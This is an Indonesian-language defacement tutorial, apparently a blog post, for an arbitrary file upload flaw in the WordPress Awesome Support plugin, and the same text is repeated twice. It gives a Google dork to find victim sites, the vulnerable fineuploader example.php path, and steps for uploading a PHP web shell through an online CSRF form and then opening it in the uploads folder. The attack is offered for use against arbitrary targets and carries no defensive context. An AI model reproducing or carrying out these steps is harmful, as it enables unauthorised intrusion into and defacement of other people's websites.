*Deface WordPress Awesome Support*
*Arbitrary File Upload Vulnerability*
Bahan :
-Dork :
inurl:/wp-content/plugins/awesome-support/
Kembangkan sendiri,
-CSRF
- shell
Vuln Cek/Exploit :
http://sitetarget.co.li/[path]/wp-content/plugins/awesome-
support/plugins/jquery.fineuploader-3.5.0/server/php/example.php
_perhatikan path_
Step by Step :
1. Dorking pake dork di atas, pilih target yang menurut ente vuln
2. Taruh exploit di belakan site target seperti contoh di atas
3.jika vuln maka akan muncul tulisan *"error";"no files were
uploaded","uploadname"inull*
4.Copy kan url target yang ada di address bar, lalu kamu lari ke CSRF online
5.Masukan url di kolom url, lalu pas Post File pilih qqfile
6.Pilih File/Shell atau yg lain nya :)
7.Klik Upload :) jika Vuln hasilnya akan muncul tulisan *"success";true,"uploadname":"shell.php*
8.Akses shell : http://sitetarget.co.li/[path]/wp-content/plugins/awesome-
support/plugins/jquery.fineuploader-3.5.0/server/php/uploads/namashell.php
9.Berhasil
*Arbitrary File Upload Vulnerability*
Bahan :
-Dork :
inurl:/wp-content/plugins/awesome-support/
Kembangkan sendiri,
-CSRF
- shell
Vuln Cek/Exploit :
http://sitetarget.co.li/[path]/wp-content/plugins/awesome-
support/plugins/jquery.fineuploader-3.5.0/server/php/example.php
_perhatikan path_
Step by Step :
1. Dorking pake dork di atas, pilih target yang menurut ente vuln
2. Taruh exploit di belakan site target seperti contoh di atas
3.jika vuln maka akan muncul tulisan *"error";"no files were
uploaded","uploadname"inull*
4.Copy kan url target yang ada di address bar, lalu kamu lari ke CSRF online
5.Masukan url di kolom url, lalu pas Post File pilih qqfile
6.Pilih File/Shell atau yg lain nya :)
7.Klik Upload :) jika Vuln hasilnya akan muncul tulisan *"success";true,"uploadname":"shell.php*
8.Akses shell : http://sitetarget.co.li/[path]/wp-content/plugins/awesome-
support/plugins/jquery.fineuploader-3.5.0/server/php/uploads/namashell.php
9.Berhasil
0 Komentar